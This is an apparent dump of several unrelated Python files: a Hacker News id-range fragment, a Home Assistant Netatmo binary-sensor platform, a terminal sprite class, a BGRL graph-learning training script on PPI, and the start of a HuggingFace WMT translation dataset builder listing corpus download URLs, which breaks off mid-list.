description="The lower (inclusive) and upper (exclusive) ids that bound the range for the partition",
)
],
)
def id_range_for_time(context):
"""
For the configured time partition, searches for the range of ids that were created in that time.
"""
id_range, metadata_entries = _id_range_for_time(
context.resources.partition_start,
context.resources.partition_end,
context.resources.hn_client,
)
yield Output(id_range, metadata_entries=metadata_entries)
|
py | 1a40d3952e9456fd7639b6fd96e762d53c5420c3 | """Support for the Netatmo binary sensors."""
import logging
from pyatmo import NoDevice
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import CONF_TIMEOUT
from homeassistant.helpers import config_validation as cv
from .const import DATA_NETATMO_AUTH
from . import CameraData
_LOGGER = logging.getLogger(__name__)
# These are the available sensors mapped to binary_sensor class
WELCOME_SENSOR_TYPES = {
"Someone known": "motion",
"Someone unknown": "motion",
"Motion": "motion",
}
PRESENCE_SENSOR_TYPES = {
"Outdoor motion": "motion",
"Outdoor human": "motion",
"Outdoor animal": "motion",
"Outdoor vehicle": "motion",
}
TAG_SENSOR_TYPES = {"Tag Vibration": "vibration", "Tag Open": "opening"}
CONF_HOME = "home"
CONF_CAMERAS = "cameras"
CONF_WELCOME_SENSORS = "welcome_sensors"
CONF_PRESENCE_SENSORS = "presence_sensors"
CONF_TAG_SENSORS = "tag_sensors"
DEFAULT_TIMEOUT = 90
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_CAMERAS, default=[]): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_HOME): cv.string,
vol.Optional(
CONF_PRESENCE_SENSORS, default=list(PRESENCE_SENSOR_TYPES)
): vol.All(cv.ensure_list, [vol.In(PRESENCE_SENSOR_TYPES)]),
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_WELCOME_SENSORS, default=list(WELCOME_SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(WELCOME_SENSOR_TYPES)]
),
}
)
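# Illustrative configuration.yaml sketch for this platform (assumption -- the home and
# camera names are hypothetical):
#   binary_sensor:
#     - platform: netatmo
#       home: MyHome
#       timeout: 90
#       cameras:
#         - LivingRoomCamera
#       welcome_sensors:
#         - Someone known
#         - Motion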
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the access to Netatmo binary sensor."""
home = config.get(CONF_HOME)
timeout = config.get(CONF_TIMEOUT)
if timeout is None:
timeout = DEFAULT_TIMEOUT
module_name = None
auth = hass.data[DATA_NETATMO_AUTH]
try:
data = CameraData(hass, auth, home)
if not data.get_camera_names():
return None
except NoDevice:
return None
welcome_sensors = config.get(CONF_WELCOME_SENSORS, WELCOME_SENSOR_TYPES)
presence_sensors = config.get(CONF_PRESENCE_SENSORS, PRESENCE_SENSOR_TYPES)
tag_sensors = config.get(CONF_TAG_SENSORS, TAG_SENSOR_TYPES)
for camera_name in data.get_camera_names():
camera_type = data.get_camera_type(camera=camera_name, home=home)
if camera_type == "NACamera":
if CONF_CAMERAS in config:
if (
config[CONF_CAMERAS] != []
and camera_name not in config[CONF_CAMERAS]
):
continue
for variable in welcome_sensors:
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
if camera_type == "NOC":
if CONF_CAMERAS in config:
if (
config[CONF_CAMERAS] != []
and camera_name not in config[CONF_CAMERAS]
):
continue
for variable in presence_sensors:
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
for module_name in data.get_module_names(camera_name):
for variable in tag_sensors:
camera_type = None
add_entities(
[
NetatmoBinarySensor(
data,
camera_name,
module_name,
home,
timeout,
camera_type,
variable,
)
],
True,
)
class NetatmoBinarySensor(BinarySensorDevice):
"""Represent a single binary sensor in a Netatmo Camera device."""
def __init__(
self, data, camera_name, module_name, home, timeout, camera_type, sensor
):
"""Set up for access to the Netatmo camera events."""
self._data = data
self._camera_name = camera_name
self._module_name = module_name
self._home = home
self._timeout = timeout
if home:
self._name = f"{home} / {camera_name}"
else:
self._name = camera_name
if module_name:
self._name += " / " + module_name
self._sensor_name = sensor
self._name += " " + sensor
self._cameratype = camera_type
self._state = None
@property
def name(self):
"""Return the name of the Netatmo device and this sensor."""
return self._name
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
if self._cameratype == "NACamera":
return WELCOME_SENSOR_TYPES.get(self._sensor_name)
if self._cameratype == "NOC":
return PRESENCE_SENSOR_TYPES.get(self._sensor_name)
return TAG_SENSOR_TYPES.get(self._sensor_name)
@property
def is_on(self):
"""Return true if binary sensor is on."""
return self._state
def update(self):
"""Request an update from the Netatmo API."""
self._data.update()
self._data.update_event()
if self._cameratype == "NACamera":
if self._sensor_name == "Someone known":
self._state = self._data.camera_data.someoneKnownSeen(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Someone unknown":
self._state = self._data.camera_data.someoneUnknownSeen(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Motion":
self._state = self._data.camera_data.motionDetected(
self._home, self._camera_name, self._timeout
)
elif self._cameratype == "NOC":
if self._sensor_name == "Outdoor motion":
self._state = self._data.camera_data.outdoormotionDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor human":
self._state = self._data.camera_data.humanDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor animal":
self._state = self._data.camera_data.animalDetected(
self._home, self._camera_name, self._timeout
)
elif self._sensor_name == "Outdoor vehicle":
self._state = self._data.camera_data.carDetected(
self._home, self._camera_name, self._timeout
)
if self._sensor_name == "Tag Vibration":
self._state = self._data.camera_data.moduleMotionDetected(
self._home, self._module_name, self._camera_name, self._timeout
)
elif self._sensor_name == "Tag Open":
self._state = self._data.camera_data.moduleOpened(
self._home, self._module_name, self._camera_name, self._timeout
)
|
py | 1a40d4c8e16a2453a390d0b366dbca9ee83fbb52 | from . import shapes, sprite, clock
import time, math
class Sprite:
def __init__(self, window, x=0, y=0, direction=(0, 0), speed=(0, 0), images=[], image_num=0, color_pair=None, group=None):
self.window = window
self.x = x
self.y = y
self.direction = tuple(direction)
self.speed = tuple(speed)
if color_pair != None:
self.color_pair = tuple(color_pair)
else:
self.color_pair = color_pair
self.images = images
self.image_num = image_num
self.source = self.images[self.image_num].source
self.width = self.images[self.image_num].width
self.height = self.images[self.image_num].height
self.image = self.images[self.image_num].value
self.animation_clock = clock.Clock()
self.group = group
if type(self.group) == list:
self.group.append(self)
def check_bounds(self):
pass
def unrender(self):
for y in range(len(self.image)):
for x in range(len(self.image[y])):
if self.image[y][x] != " " and 0 <= math.floor(self.x) + x <= self.window.width - 2 and 0 <= math.floor(self.y) + y <= self.window.height - 2:
is_changed = not(self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][1:] == [self.window.char, self.window.color_pair])
if not is_changed:
is_changed = self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][0]
self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x] = [is_changed, self.window.char, self.window.color_pair]
def render(self):
for y in range(len(self.image)):
for x in range(len(self.image[y])):
if self.image[y][x] != " " and 0 <= math.floor(self.x) + x <= self.window.width - 2 and 0 <= math.floor(self.y) + y <= self.window.height - 2:
is_changed = not(self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][1:] == [self.image[y][x], self.color_pair])
if not is_changed:
is_changed = self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x][0]
self.window.screen_array[math.floor(self.y) + y][math.floor(self.x) + x] = [is_changed, self.image[y][x], self.color_pair]
def update(self, dt):
self.unrender()
self.x += self.direction[0] * self.speed[0] * dt
self.y += self.direction[1] * self.speed[1] * dt
self.check_bounds()
def animate(self, loop=True, fps=60):
if self.animation_clock.get_dt() >= 1 / fps:
if self.image_num == len(self.images):
if loop:
self.image_num = 0
else:
self.destroy()
return
self.unrender()
self.source = self.images[self.image_num].source
self.width = self.images[self.image_num].width
self.height = self.images[self.image_num].height
self.image = self.images[self.image_num].value
self.image_num += 1
self.animation_clock.update()
self.render()
def destroy(self):
self.unrender()
if self.group:
self.group.remove(self)
def check_group_collision(self, others):
for obj in others:
collided = self.is_collided_with(obj)
if not(collided is self) and collided:
return collided
def is_collided_with(self, other):
if (self.x < other.x + other.width and self.x + self.width > other.x) and (self.y < other.y + other.height and self.y + self.height > other.y) \
and (isinstance(other, shapes.Rect) or isinstance(other, sprite.Sprite)):
return other |
py | 1a40d52b99bd55ccc955144f781ec40ca8bbf3f5 | import copy
import logging
import os
from absl import app
from absl import flags
import torch
from torch.nn.functional import cosine_similarity
from torch.optim import AdamW
from torch.utils.tensorboard import SummaryWriter
from torch_geometric.data import DataLoader
from torch_geometric.datasets import PPI
from tqdm import tqdm
from bgrl import *
log = logging.getLogger(__name__)
FLAGS = flags.FLAGS
flags.DEFINE_integer('seed', None, 'Random seed.')
flags.DEFINE_integer('num_workers', 1, 'Number of CPU workers for dataloader.')
# Dataset.
flags.DEFINE_string('dataset_dir', './data', 'Where the dataset resides.')
# Architecture.
flags.DEFINE_integer('predictor_hidden_size', 4096, 'Hidden size of predictor.')
# Training hyperparameters.
flags.DEFINE_integer('steps', 10000, 'The number of training epochs.')
flags.DEFINE_integer('batch_size', 22, 'Number of graphs used in a batch.')
flags.DEFINE_float('lr', 0.02, 'The learning rate for model training.')
flags.DEFINE_float('weight_decay', 5e-4, 'The value of the weight decay.')
flags.DEFINE_float('mm', 0.99, 'The momentum for moving average.')
flags.DEFINE_integer('lr_warmup_steps', 1000, 'Warmup period for learning rate.')
# Augmentations.
flags.DEFINE_float('drop_edge_p_1', 0., 'Probability of edge dropout 1.')
flags.DEFINE_float('drop_feat_p_1', 0., 'Probability of node feature dropout 1.')
flags.DEFINE_float('drop_edge_p_2', 0., 'Probability of edge dropout 2.')
flags.DEFINE_float('drop_feat_p_2', 0., 'Probability of node feature dropout 2.')
# Logging and checkpoint.
flags.DEFINE_string('logdir', None, 'Where the checkpoint and logs are stored.')
flags.DEFINE_integer('log_steps', 10, 'Log information at every log_steps.')
# Evaluation
flags.DEFINE_integer('eval_steps', 2000, 'Evaluate every eval_epochs.')
def main(argv):
# use CUDA_VISIBLE_DEVICES to select gpu
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
log.info('Using {} for training.'.format(device))
# set random seed
if FLAGS.seed is not None:
log.info('Random seed set to {}.'.format(FLAGS.seed))
set_random_seeds(random_seed=FLAGS.seed)
# create log directory
os.makedirs(FLAGS.logdir, exist_ok=True)
with open(os.path.join(FLAGS.logdir, 'config.cfg'), "w") as file:
file.write(FLAGS.flags_into_string()) # save config file
# setup tensorboard
writer = SummaryWriter(FLAGS.logdir)
# load data
train_dataset = PPI(FLAGS.dataset_dir, split='train')
val_dataset = PPI(FLAGS.dataset_dir, split='val')
test_dataset = PPI(FLAGS.dataset_dir, split='test')
log.info('Dataset {}, graph 0: {}.'.format(train_dataset.__class__.__name__, train_dataset[0]))
# train BGRL using both train and val splits
train_loader = DataLoader(ConcatDataset([train_dataset, val_dataset]), batch_size=FLAGS.batch_size, shuffle=True,
num_workers=FLAGS.num_workers)
# prepare transforms
transform_1 = get_graph_drop_transform(drop_edge_p=FLAGS.drop_edge_p_1, drop_feat_p=FLAGS.drop_feat_p_1)
transform_2 = get_graph_drop_transform(drop_edge_p=FLAGS.drop_edge_p_2, drop_feat_p=FLAGS.drop_feat_p_2)
# build networks
input_size, representation_size = train_dataset.num_node_features, 512
encoder = GraphSAGE_GCN(input_size, 512, 512)
predictor = MLP_Predictor(representation_size, representation_size, hidden_size=FLAGS.predictor_hidden_size)
model = BGRL(encoder, predictor).to(device)
# optimizer
optimizer = AdamW(model.trainable_parameters(), lr=0., weight_decay=FLAGS.weight_decay)
# scheduler
lr_scheduler = CosineDecayScheduler(FLAGS.lr, FLAGS.lr_warmup_steps, FLAGS.steps)
mm_scheduler = CosineDecayScheduler(1 - FLAGS.mm, 0, FLAGS.steps)
def train(data, step):
model.train()
# move data to gpu and transform
data = data.to(device)
x1, x2 = transform_1(data), transform_2(data)
# update learning rate
lr = lr_scheduler.get(step)
for g in optimizer.param_groups:
g['lr'] = lr
# update momentum
mm = 1 - mm_scheduler.get(step)
# forward
optimizer.zero_grad()
q1, y2 = model(x1, x2)
q2, y1 = model(x2, x1)
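        # Descriptive note: the loss below is the symmetrized BYOL-style objective; each
        # `1 - cos(q, y.detach())` term equals 0.5 * ||q_hat - y_hat||^2 for the
        # L2-normalized vectors, so the online predictions are pulled toward the
        # stop-gradient target projections in both augmentation directions.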
loss = 2 - cosine_similarity(q1, y2.detach(), dim=-1).mean() - cosine_similarity(q2, y1.detach(), dim=-1).mean()
loss.backward()
# update online network
optimizer.step()
# update target network
model.update_target_network(mm)
# log scalars
writer.add_scalar('params/lr', lr, step)
writer.add_scalar('params/mm', mm, step)
writer.add_scalar('train/loss', loss, step)
def eval(step):
tmp_encoder = copy.deepcopy(model.online_encoder).eval()
train_data = compute_representations(tmp_encoder, train_dataset, device)
val_data = compute_representations(tmp_encoder, val_dataset, device)
test_data = compute_representations(tmp_encoder, test_dataset, device)
val_f1, test_f1 = ppi_train_linear_layer(train_dataset.num_classes, train_data, val_data, test_data, device)
writer.add_scalar('accuracy/val', val_f1, step)
writer.add_scalar('accuracy/test', test_f1, step)
train_iter = iter(train_loader)
for step in tqdm(range(1, FLAGS.steps + 1)):
data = next(train_iter, None)
if data is None:
train_iter = iter(train_loader)
data = next(train_iter, None)
train(data, step)
if step % FLAGS.eval_steps == 0:
eval(step)
# save encoder weights
torch.save({'model': model.online_encoder.state_dict()}, os.path.join(FLAGS.logdir, 'bgrl-wikics.pt'))
if __name__ == "__main__":
log.info('PyTorch version: %s' % torch.__version__)
app.run(main)
|
py | 1a40d533d8d5c814dd8106ab1dd1ee877cd854d1 | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""WMT: Translate dataset."""
import codecs
import functools
import glob
import gzip
import itertools
import os
import re
import xml.etree.cElementTree as ElementTree
from abc import ABC, abstractmethod
import datasets
logger = datasets.logging.get_logger(__name__)
_DESCRIPTION = """\
Translate dataset based on the data from statmt.org.
Versions exists for the different years using a combination of multiple data
sources. The base `wmt_translate` allows you to create your own config to choose
your own data/language pair by creating a custom `datasets.translate.wmt.WmtConfig`.
```
config = datasets.wmt.WmtConfig(
version="0.0.1",
language_pair=("fr", "de"),
subsets={
datasets.Split.TRAIN: ["commoncrawl_frde"],
datasets.Split.VALIDATION: ["euelections_dev2019"],
},
)
builder = datasets.builder("wmt_translate", config=config)
```
"""
CWMT_SUBSET_NAMES = ["casia2015", "casict2011", "casict2015", "datum2015", "datum2017", "neu2017"]
class SubDataset:
"""Class to keep track of information on a sub-dataset of WMT."""
def __init__(self, name, target, sources, url, path, manual_dl_files=None):
"""Sub-dataset of WMT.
Args:
name: `string`, a unique dataset identifier.
target: `string`, the target language code.
sources: `set<string>`, the set of source language codes.
url: `string` or `(string, string)`, URL(s) or URL template(s) specifying
where to download the raw data from. If two strings are provided, the
first is used for the source language and the second for the target.
Template strings can either contain '{src}' placeholders that will be
filled in with the source language code, '{0}' and '{1}' placeholders
that will be filled in with the source and target language codes in
alphabetical order, or all 3.
path: `string` or `(string, string)`, path(s) or path template(s)
specifying the path to the raw data relative to the root of the
downloaded archive. If two strings are provided, the dataset is assumed
to be made up of parallel text files, the first being the source and the
second the target. If one string is provided, both languages are assumed
to be stored within the same file and the extension is used to determine
how to parse it. Template strings should be formatted the same as in
`url`.
manual_dl_files: `<list>(string)` (optional), the list of files that must
be manually downloaded to the data directory.
"""
self._paths = (path,) if isinstance(path, str) else path
self._urls = (url,) if isinstance(url, str) else url
self._manual_dl_files = manual_dl_files if manual_dl_files else []
self.name = name
self.target = target
self.sources = set(sources)
def _inject_language(self, src, strings):
"""Injects languages into (potentially) template strings."""
if src not in self.sources:
raise ValueError("Invalid source for '{0}': {1}".format(self.name, src))
def _format_string(s):
if "{0}" in s and "{1}" and "{src}" in s:
return s.format(*sorted([src, self.target]), src=src)
elif "{0}" in s and "{1}" in s:
return s.format(*sorted([src, self.target]))
elif "{src}" in s:
return s.format(src=src)
else:
return s
return [_format_string(s) for s in strings]
def get_url(self, src):
return self._inject_language(src, self._urls)
def get_manual_dl_files(self, src):
return self._inject_language(src, self._manual_dl_files)
def get_path(self, src):
return self._inject_language(src, self._paths)
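# Illustrative sketch (not part of the WMT subset definitions below): how the
# placeholder injection above resolves a hypothetical SubDataset. The name and
# URL here are made up purely to show the "{src}"/"{0}"/"{1}" behaviour
# documented in __init__.
#
#   example = SubDataset(
#       name="example_corpus",
#       target="en",
#       sources={"de"},
#       url="http://example.org/{0}-{1}/corpus.{src}.gz",
#       path="corpus.{src}",
#   )
#   example.get_url("de")   # -> ["http://example.org/de-en/corpus.de.gz"]
#   example.get_path("de")  # -> ["corpus.de"]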
# Subsets used in the training sets for various years of WMT.
_TRAIN_SUBSETS = [
# pylint:disable=line-too-long
SubDataset(
name="commoncrawl",
target="en", # fr-de pair in commoncrawl_frde
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-commoncrawl.tgz",
path=("commoncrawl.{src}-en.{src}", "commoncrawl.{src}-en.en"),
),
SubDataset(
name="commoncrawl_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/commoncrawl.fr.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/commoncrawl.de.gz",
),
path=("", ""),
),
SubDataset(
name="czeng_10",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/czeng10",
manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
name="czeng_16pre",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/czeng16pre",
manual_dl_files=["czeng16pre.deduped-ignoring-sections.txt.gz"],
path="",
),
SubDataset(
name="czeng_16",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng",
manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
# This dataset differs from the above in the filtering that is applied
# during parsing.
name="czeng_17",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng",
manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
name="dcep_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/dcep.lv-en.v1.tgz",
path=("dcep.en-lv/dcep.lv", "dcep.en-lv/dcep.en"),
),
SubDataset(
name="europarl_v7",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-europarl-v7.tgz",
path=("training/europarl-v7.{src}-en.{src}", "training/europarl-v7.{src}-en.en"),
),
SubDataset(
name="europarl_v7_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/europarl-v7.fr.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/europarl-v7.de.gz",
),
path=("", ""),
),
SubDataset(
name="europarl_v8_18",
target="en",
sources={"et", "fi"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/training-parallel-ep-v8.tgz",
path=("training/europarl-v8.{src}-en.{src}", "training/europarl-v8.{src}-en.en"),
),
SubDataset(
name="europarl_v8_16",
target="en",
sources={"fi", "ro"},
url="https://huggingface.co/datasets/wmt/wmt16/resolve/main/translation-task/training-parallel-ep-v8.tgz",
path=("training-parallel-ep-v8/europarl-v8.{src}-en.{src}", "training-parallel-ep-v8/europarl-v8.{src}-en.en"),
),
SubDataset(
name="europarl_v9",
target="en",
sources={"cs", "de", "fi", "lt"},
url="https://huggingface.co/datasets/wmt/europarl/resolve/main/v9/training/europarl-v9.{src}-en.tsv.gz",
path="",
),
SubDataset(
name="gigafren",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt10/resolve/main/training-giga-fren.tar",
path=("giga-fren.release2.fixed.fr.gz", "giga-fren.release2.fixed.en.gz"),
),
SubDataset(
name="hindencorp_01",
target="en",
sources={"hi"},
url="http://ufallab.ms.mff.cuni.cz/~bojar/hindencorp",
manual_dl_files=["hindencorp0.1.gz"],
path="",
),
SubDataset(
name="leta_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/leta.v1.tgz",
path=("LETA-lv-en/leta.lv", "LETA-lv-en/leta.en"),
),
SubDataset(
name="multiun",
target="en",
sources={"es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-un.tgz",
path=("un/undoc.2000.{src}-en.{src}", "un/undoc.2000.{src}-en.en"),
),
SubDataset(
name="newscommentary_v9",
target="en",
sources={"cs", "de", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt14/resolve/main/training-parallel-nc-v9.tgz",
path=("training/news-commentary-v9.{src}-en.{src}", "training/news-commentary-v9.{src}-en.en"),
),
SubDataset(
name="newscommentary_v10",
target="en",
sources={"cs", "de", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/training-parallel-nc-v10.tgz",
path=("news-commentary-v10.{src}-en.{src}", "news-commentary-v10.{src}-en.en"),
),
SubDataset(
name="newscommentary_v11",
target="en",
sources={"cs", "de", "ru"},
url="https://huggingface.co/datasets/wmt/wmt16/resolve/main/translation-task/training-parallel-nc-v11.tgz",
path=(
"training-parallel-nc-v11/news-commentary-v11.{src}-en.{src}",
"training-parallel-nc-v11/news-commentary-v11.{src}-en.en",
),
),
SubDataset(
name="newscommentary_v12",
target="en",
sources={"cs", "de", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/training-parallel-nc-v12.tgz",
path=("training/news-commentary-v12.{src}-en.{src}", "training/news-commentary-v12.{src}-en.en"),
),
SubDataset(
name="newscommentary_v13",
target="en",
sources={"cs", "de", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/training-parallel-nc-v13.tgz",
path=(
"training-parallel-nc-v13/news-commentary-v13.{src}-en.{src}",
"training-parallel-nc-v13/news-commentary-v13.{src}-en.en",
),
),
SubDataset(
name="newscommentary_v14",
target="en", # fr-de pair in newscommentary_v14_frde
sources={"cs", "de", "kk", "ru", "zh"},
url="http://data.statmt.org/news-commentary/v14/training/news-commentary-v14.{0}-{1}.tsv.gz",
path="",
),
SubDataset(
name="newscommentary_v14_frde",
target="de",
sources={"fr"},
url="http://data.statmt.org/news-commentary/v14/training/news-commentary-v14.de-fr.tsv.gz",
path="",
),
SubDataset(
name="onlinebooks_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/books.lv-en.v1.tgz",
path=("farewell/farewell.lv", "farewell/farewell.en"),
),
SubDataset(
name="paracrawl_v1",
target="en",
sources={"cs", "de", "et", "fi", "ru"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release1/paracrawl-release1.en-{src}.zipporah0-dedup-clean.tgz",
path=(
"paracrawl-release1.en-{src}.zipporah0-dedup-clean.{src}",
"paracrawl-release1.en-{src}.zipporah0-dedup-clean.en",
),
),
SubDataset(
name="paracrawl_v1_ru",
target="en",
sources={"ru"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release1/paracrawl-release1.en-ru.zipporah0-dedup-clean.tgz",
path=(
"paracrawl-release1.en-ru.zipporah0-dedup-clean.ru",
"paracrawl-release1.en-ru.zipporah0-dedup-clean.en",
),
),
SubDataset(
name="paracrawl_v3",
target="en", # fr-de pair in paracrawl_v3_frde
sources={"cs", "de", "fi", "lt"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release3/en-{src}.bicleaner07.tmx.gz",
path="",
),
SubDataset(
name="paracrawl_v3_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/de-fr.bicleaner07.de.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/de-fr.bicleaner07.fr.gz",
),
path=("", ""),
),
SubDataset(
name="rapid_2016",
target="en",
sources={"de", "et", "fi"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/rapid2016.tgz",
path=("rapid2016.{0}-{1}.{src}", "rapid2016.{0}-{1}.en"),
),
SubDataset(
name="rapid_2016_ltfi",
target="en",
sources={"fi", "lt"},
url="https://tilde-model.s3-eu-west-1.amazonaws.com/rapid2016.en-{src}.tmx.zip",
path="rapid2016.en-{src}.tmx",
),
SubDataset(
name="rapid_2019",
target="en",
sources={"de"},
url="https://s3-eu-west-1.amazonaws.com/tilde-model/rapid2019.de-en.zip",
path=("rapid2019.de-en.de", "rapid2019.de-en.en"),
),
SubDataset(
name="setimes_2",
target="en",
sources={"ro", "tr"},
url="https://opus.nlpl.eu/download.php?f=SETIMES/v2/tmx/en-{src}.tmx.gz",
path="",
),
SubDataset(
name="uncorpus_v1",
target="en",
sources={"ru", "zh"},
url="https://huggingface.co/datasets/wmt/uncorpus/resolve/main/UNv1.0.en-{src}.tar.gz",
path=("en-{src}/UNv1.0.en-{src}.{src}", "en-{src}/UNv1.0.en-{src}.en"),
),
SubDataset(
name="wikiheadlines_fi",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/wiki-titles.tgz",
path="wiki/fi-en/titles.fi-en",
),
SubDataset(
name="wikiheadlines_hi",
target="en",
sources={"hi"},
url="https://huggingface.co/datasets/wmt/wmt14/resolve/main/wiki-titles.tgz",
path="wiki/hi-en/wiki-titles.hi-en",
),
SubDataset(
# Verified that wmt14 and wmt15 files are identical.
name="wikiheadlines_ru",
target="en",
sources={"ru"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/wiki-titles.tgz",
path="wiki/ru-en/wiki.ru-en",
),
SubDataset(
name="wikititles_v1",
target="en",
sources={"cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wikititles/resolve/main/v1/wikititles-v1.{src}-en.tsv.gz",
path="",
),
SubDataset(
name="yandexcorpus",
target="en",
sources={"ru"},
url="https://translate.yandex.ru/corpus?lang=en",
manual_dl_files=["1mcorpus.zip"],
path=("corpus.en_ru.1m.ru", "corpus.en_ru.1m.en"),
),
# pylint:enable=line-too-long
] + [
SubDataset( # pylint:disable=g-complex-comprehension
name=ss,
target="en",
sources={"zh"},
url="ftp://cwmt-wmt:[email protected]/parallel/%s.zip" % ss,
path=("%s/*_c[hn].txt" % ss, "%s/*_en.txt" % ss),
)
for ss in CWMT_SUBSET_NAMES
]
_DEV_SUBSETS = [
SubDataset(
name="euelections_dev2019",
target="de",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/euelections_dev2019.fr-de.src.fr", "dev/euelections_dev2019.fr-de.tgt.de"),
),
SubDataset(
name="newsdev2014",
target="en",
sources={"hi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2014.hi", "dev/newsdev2014.en"),
),
SubDataset(
name="newsdev2015",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2015-fien-src.{src}.sgm", "dev/newsdev2015-fien-ref.en.sgm"),
),
SubDataset(
name="newsdiscussdev2015",
target="en",
sources={"ro", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscussdev2015-{src}en-src.{src}.sgm", "dev/newsdiscussdev2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2016",
target="en",
sources={"ro", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2016-{src}en-src.{src}.sgm", "dev/newsdev2016-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2017",
target="en",
sources={"lv", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2017-{src}en-src.{src}.sgm", "dev/newsdev2017-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2018",
target="en",
sources={"et"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2018-{src}en-src.{src}.sgm", "dev/newsdev2018-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2019",
target="en",
sources={"gu", "kk", "lt"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
